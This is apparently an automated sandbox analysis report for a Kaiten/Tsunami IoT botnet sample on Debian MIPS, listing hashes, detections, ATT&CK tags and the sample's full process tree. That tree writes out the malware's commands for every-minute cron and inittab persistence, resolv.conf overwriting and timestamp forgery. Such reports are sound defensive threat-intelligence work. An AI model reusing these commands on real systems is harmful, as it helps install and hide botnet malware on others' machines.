kaiten | 6a3d6e28dbed506a14110577cb4bcb68efc1d2b0e13c9217f9c972fbcc6e0b3f

Analysis

max time kernel
149s
max time network
149s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
29-07-2024 11:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

432da226279b1d29bf077cbb689777eb_JaffaCakes118
Size

662KB
MD5

432da226279b1d29bf077cbb689777eb
SHA1

976391ad6b740eda1ffb70d33c28a60c4baeb74b
SHA256

6a3d6e28dbed506a14110577cb4bcb68efc1d2b0e13c9217f9c972fbcc6e0b3f
SHA512

7bd971667ae15861a3bbaa20e4c41611cd7f1a623f2485961da31f6edb9772bf247b8fe0e94d93dc5c1fbf30ec48fac69155a04d3e9684954d16ec9979394bc5
SSDEEP

12288:cdUMRT8U2E7hFNPuN0oR9DfCDkAnEzDLjsC4jvtwDFiKCdgOEFwUCdV:ceMRT8RINa/PzDLmYFiRgTwb

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/708-1-0x00400000-0x00610e70-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	sh

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.QUC3yF	crontab

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/1/cmdline	432da226279b1d29bf077cbb689777eb_JaffaCakes118
File opened for reading	/proc/version	432da226279b1d29bf077cbb689777eb_JaffaCakes118
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/filesystems	crontab

/tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
/tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
1⤵
- Reads runtime system information
PID:708
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  - Writes DNS configuration
  PID:713
- /bin/sh
  sh -c "chmod 700 /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118 > /dev/null 2>&1 &"
  2⤵
  PID:715
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118"
  2⤵
  PID:717
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
    3⤵
    PID:718
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1"
  2⤵
  PID:719
- - /bin/grep
    grep -v "no cron"
    3⤵
    PID:723
- - /usr/bin/crontab
    crontab -l
    3⤵
    - Reads runtime system information
    PID:721
- - /bin/grep
    grep -v /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
    3⤵
    PID:722
- - /bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:724
- /bin/sh
  sh -c "echo \"* * * * * /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x00846930886"
  2⤵
  PID:725
- /bin/sh
  sh -c "crontab /var/run/.x00846930886"
  2⤵
  PID:726
- - /usr/bin/crontab
    crontab /var/run/.x00846930886
    3⤵
    - Creates/modifies Cron job
    - Reads runtime system information
    PID:727
- /bin/sh
  sh -c "rm -rf /var/run/.x00846930886"
  2⤵
  PID:728
- - /bin/rm
    rm -rf /var/run/.x00846930886
    3⤵
    PID:729
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118\" > /etc/inittab2"
  2⤵
  PID:730
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:731
- - /bin/grep
    grep -v /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
    3⤵
    PID:732
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118\" >> /etc/inittab2"
  2⤵
  PID:733
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:734
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:735
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:736
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:737
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:738
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:739
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:740
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:741
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:742
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:743
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:744
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:745

/bin/chmod
chmod 700 /tmp/432da226279b1d29bf077cbb689777eb_JaffaCakes118
1⤵
PID:716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
67B

MD5
35a72766fbca4a599c3c61582775b42e

SHA1
2921dd28c5231debacec3bf74e80784c83f49b41

SHA256
c3f06ed20e39df3c4fc68e6ba7fbc73b1d52d1bb7e8fbd09505a5082c86e8609

SHA512
a5bfc68e9c4e64a61a8cce95485bf273c8de54709baf3c7249a20f86019cc3a47fff8dc64fa8c9c02bfc3b6a69faca53972f70c986c0e31013f856d948b8a178

Download Submit
/run/.x00846930886

Filesize
81B

MD5
57f63943440e1ba1e6b9241201f8e4b4

SHA1
24ed78454f8c8b1697be72896ba6a1aa6b5f98bb

SHA256
b32e7050ca1384f0d397ebc7e5576901640d17637bce02f1d8048bba8231ba2b

SHA512
3d7ca5958b1d542a2fdeba7a3b580f9731311b3ae4ef95233d7958279a7966017b548541577885f8d685f99af93a45ec8f34dd158c80713603f1569dfbbddb31

Download Submit
/var/spool/cron/crontabs/tmp.QUC3yF

Filesize
277B

MD5
978abbde75632fd16aae53a23b2daf70

SHA1
d4c0fe90490fae020a0f004de40b0800b033d6f1

SHA256
35f2c6c7d36ad4a87a04a7e959a06bbfabf79297f5c50c6219a2cc8969ededd7

SHA512
a32f66076058f6e425c092a9cfaefc7c4f91a7a834648757fd323e03d25678b2743e24cb99a3e8ebf91646067c5c4a40c35abed8aed4f9f89cd4e30d30cea082

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads